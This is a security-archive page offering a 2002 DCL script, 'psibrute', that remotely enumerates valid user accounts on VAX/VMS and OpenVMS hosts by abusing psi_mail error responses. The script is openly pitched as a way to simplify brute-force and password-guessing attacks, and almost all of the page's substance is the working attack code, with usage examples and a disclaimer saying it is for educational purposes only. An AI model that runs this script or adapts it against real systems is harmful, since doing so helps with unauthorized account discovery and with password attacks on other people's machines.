what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

psibrute.com.txt

psibrute.com.txt
Posted Nov 17, 2002
Authored by Marco Ivaldi | Site 0xdeadbeef.info

This DCL script abuses the old psi_mail trick on VAX/VMS systems to remotely find valid users.

systems | vax
SHA-256 | b300bdc9bf7a8a50ee833fcd7c6502f1b542165feca28c88b135ae16d0afbccb

psibrute.com.txt

Change Mirror Download
$!
$! $Id: psibrute.com,v 1.1 2002/10/11 20:00:57 raptor Exp $
$!
$! psibrute v1.0 - VAX/VMS psi_mail remote bruteforcer
$! Copyright (c) 2002 Raptor <raptor@0xdeadbeef.info>
$!
$! PSIBRUTE abuses the old but still effective psi_mail
$! trick on VAX/VMS systems to remotely find valid
$! accounts. It can really simplify bruteforce and/or
$! password-guessing attacks (sending no real mail).
$!
$! Usage: @psibrute <account_file> [<remote_address>]
$! Example: @psibrute vax.txt psi%0208057040540
$!
$! Tested on VAX/VMS V5.5 and OpenVMS V7.2.
$!
$! FOR EDUCATIONAL PURPOSES ONLY.
$!
$
$! Definitions
$ we :== write sys$error
$
$! Parameters and files
$ if P1 .eqs. "" then goto syntax
$ if P2 .eqs. "" then P2 = 0
$ open/read list 'P1'
$ crea psi.tmp
$ open/write log psi.log
$
$ we ""
$ we "*** PSI_BRUTE scanner for VAX/VMS ***"
$ we ""
$
$! Main loop
$ loop:
$ on error then continue
$ on severe_error then continue
$ read list login/end=cleanup
$ define/nolog/user_mode sys$output psi.out
$! We can't simply use "on warning" statement
$! because we don't want to send any real mail
$ mail psi.tmp "NOSUCHUSR", 'P2'::'login'
$
$! A nice trick (2 reads are better than 1)
$ define/nolog/user_mode sys$output sys$error
$ open/read output psi.out
$ read output out
$ read output out/end=found
$ we "[ ] ", login, " is not valid..."
$
$ closeout:
$ close output
$ del psi.out;*
$ goto loop
$
$ found:
$ write log login
$ we "[x] ", login, " is VALID for host ", P2, " !"
$ goto closeout
$
$ cleanup:
$ close list
$ close log
$ del psi.tmp;*
$ we ""
$ we "*** End of remote bruteforce scan ***"
$ we ""
$ exit
$
$ syntax:
$ we "%PSI_BRUTE, error; syntax: @psibrute <account_file> [<remote_address>]"
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close